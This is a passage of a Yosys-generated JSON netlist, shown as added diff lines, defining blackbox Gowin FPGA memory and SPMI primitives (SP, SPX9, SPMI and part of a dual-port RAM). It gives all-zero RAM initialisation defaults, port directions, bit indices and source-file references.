"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE": "0", + "RESET_MODE": "SYNC" + }, + "ports": { + "CLKA": { + "direction": "input", + "bits": [ 2 ] + }, + "CEA": { + "direction": "input", + "bits": [ 3 ] + }, + "CLKB": { + "direction": "input", + "bits": [ 4 ] + }, + "CEB": { + "direction": "input", + "bits": [ 5 ] + }, + "OCE": { + "direction": "input", + "bits": [ 6 ] + }, + "RESETA": { + "direction": "input", + "bits": [ 7 ] + }, + "RESETB": { + "direction": "input", + "bits": [ 8 ] + }, + "ADA": { + "direction": "input", + "bits": [ 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22 ] + }, + "ADB": { + "direction": "input", + "bits": [ 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36 ] + }, + "BLKSELA": { + "direction": "input", + "bits": [ 37, 38, 39 ] + }, + "BLKSELB": { + "direction": "input", + "bits": [ 40, 41, 42 ] + }, + "DI": { + "direction": "input", + "bits": [ 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78 ] + }, + "DO": { + "direction": "output", + "bits": [ 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114 ] + } + }, + "cells": { + }, + "netnames": { + "ADA": { + "hide_name": 0, + "bits": [ 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:977.14-977.17" + } + }, + "ADB": { + "hide_name": 0, + "bits": [ 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:977.19-977.22" + } + }, + "BLKSELA": { + "hide_name": 0, + "bits": [ 37, 38, 39 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:978.13-978.20" + } + }, + "BLKSELB": { + "hide_name": 0, + "bits": [ 40, 41, 42 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:978.22-978.29" + } + }, + "CEA": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:974.13-974.16" + } + }, + "CEB": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:974.24-974.27" + } + }, + "CLKA": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:974.7-974.11" + } + }, + "CLKB": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:974.18-974.22" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:979.14-979.16" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:980.15-980.17" + } + }, + "OCE": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:975.7-975.10" + } + }, + "RESETA": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:976.7-976.13" + } + }, + "RESETB": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:976.15-976.21" + } + } + } + }, + "SP": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1263.1-1347.10" + }, + "parameter_default_values": { + "BIT_WIDTH": "00000000000000000000000000100000", + "BLK_SEL": "000", + "INIT_RAM_00": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE": "0", + "RESET_MODE": "SYNC", + "WRITE_MODE": "00" + }, + "ports": { + "DO": { + "direction": "output", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33 ] + }, + "DI": { + "direction": "input", + "bits": [ 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65 ] + }, + "BLKSEL": { + "direction": "input", + "bits": [ 66, 67, 68 ] + }, + "AD": { + "direction": "input", + "bits": [ 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82 ] + }, + "WRE": { + "direction": "input", + "bits": [ 83 ] + }, + "CLK": { + "direction": "input", + "bits": [ 84 ] + }, + "CE": { + "direction": "input", + "bits": [ 85 ] + }, + "OCE": { + "direction": "input", + "bits": [ 86 ] + }, + "RESET": { + "direction": "input", + "bits": [ 87 ] + } + }, + "cells": { + }, + "netnames": { + "AD": { + "hide_name": 0, + "bits": [ 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1340.14-1340.16" + } + }, + "BLKSEL": { + "hide_name": 0, + "bits": [ 66, 67, 68 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1339.13-1339.19" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 85 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1343.7-1343.9" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 84 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1342.7-1342.10" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1338.14-1338.16" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1337.15-1337.17" + } + }, + "OCE": { + "hide_name": 0, + "bits": [ 86 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1344.7-1344.10" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 87 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1345.7-1345.12" + } + }, + "WRE": { + "hide_name": 0, + "bits": [ 83 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1341.7-1341.10" + } + } + } + }, + "SPMI": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1797.1-1815.10" + }, + "parameter_default_values": { + "CLK_FREQ": "0000000", + "FUNCTION_CTRL": "0000000", + "MSID_CLKSEL": "0000000", + "RESPOND_DELAY": "0000", + "SCLK_LOW_PERIOD": "0000000", + "SCLK_NORMAL_PERIOD": "0000000", + "SHUTDOWN_BY_ENABLE": "0" + }, + "ports": { + "CLKEXT": { + "direction": "input", + "bits": [ 2 ] + }, + "ENEXT": { + "direction": "input", + "bits": [ 3 ] + }, + "SDATA": { + "direction": "inout", + "bits": [ 4 ] + }, + "SCLK": { + "direction": "inout", + "bits": [ 5 ] + }, + "CLK": { + "direction": "input", + "bits": [ 6 ] + }, + "CE": { + "direction": "input", + "bits": [ 7 ] + }, + "RESETN": { + "direction": "input", + "bits": [ 8 ] + }, + "LOCRESET": { + "direction": "input", + "bits": [ 9 ] + }, + "PA": { + "direction": "input", + "bits": [ 10 ] + }, + "SA": { + "direction": "input", + "bits": [ 11 ] + }, + "CA": { + "direction": "input", + "bits": [ 12 ] + }, + "ADDRI": { + "direction": "input", + "bits": [ 13, 14, 15, 16 ] + }, + "DATAI": { + "direction": "input", + "bits": [ 17, 18, 19, 20, 21, 22, 23, 24 ] + }, + "ADDRO": { + "direction": "output", + "bits": [ 25, 26, 27, 28 ] + }, + "DATAO": { + "direction": "output", + "bits": [ 29, 30, 31, 32, 33, 34, 35, 36 ] + }, + "STATE": { + "direction": "output", + "bits": [ 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52 ] + }, + "CMD": { + "direction": "output", + "bits": [ 53, 54, 55, 56 ] + } + }, + "cells": { + }, + "netnames": { + "ADDRI": { + "hide_name": 0, + "bits": [ 13, 14, 15, 16 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1809.14-1809.19" + } + }, + "ADDRO": { + "hide_name": 0, + "bits": [ 25, 26, 27, 28 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1811.16-1811.21" + } + }, + "CA": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1808.16-1808.18" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1807.13-1807.15" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1807.8-1807.11" + } + }, + "CLKEXT": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1805.7-1805.13" + } + }, + "CMD": { + "hide_name": 0, + "bits": [ 53, 54, 55, 56 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1814.14-1814.17" + } + }, + "DATAI": { + "hide_name": 0, + "bits": [ 17, 18, 19, 20, 21, 22, 23, 24 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1810.14-1810.19" + } + }, + "DATAO": { + "hide_name": 0, + "bits": [ 29, 30, 31, 32, 33, 34, 35, 36 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1812.16-1812.21" + } + }, + "ENEXT": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1805.15-1805.20" + } + }, + "LOCRESET": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1807.25-1807.33" + } + }, + "PA": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1808.8-1808.10" + } + }, + "RESETN": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1807.17-1807.23" + } + }, + "SA": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1808.12-1808.14" + } + }, + "SCLK": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1806.15-1806.19" + } + }, + "SDATA": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1806.7-1806.12" + } + }, + "STATE": { + "hide_name": 0, + "bits": [ 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1813.17-1813.22" + } + } + } + }, + "SPX9": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1350.1-1434.10" + }, + "parameter_default_values": { + "BIT_WIDTH": "00000000000000000000000000100100", + "BLK_SEL": "000", + "INIT_RAM_00": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": 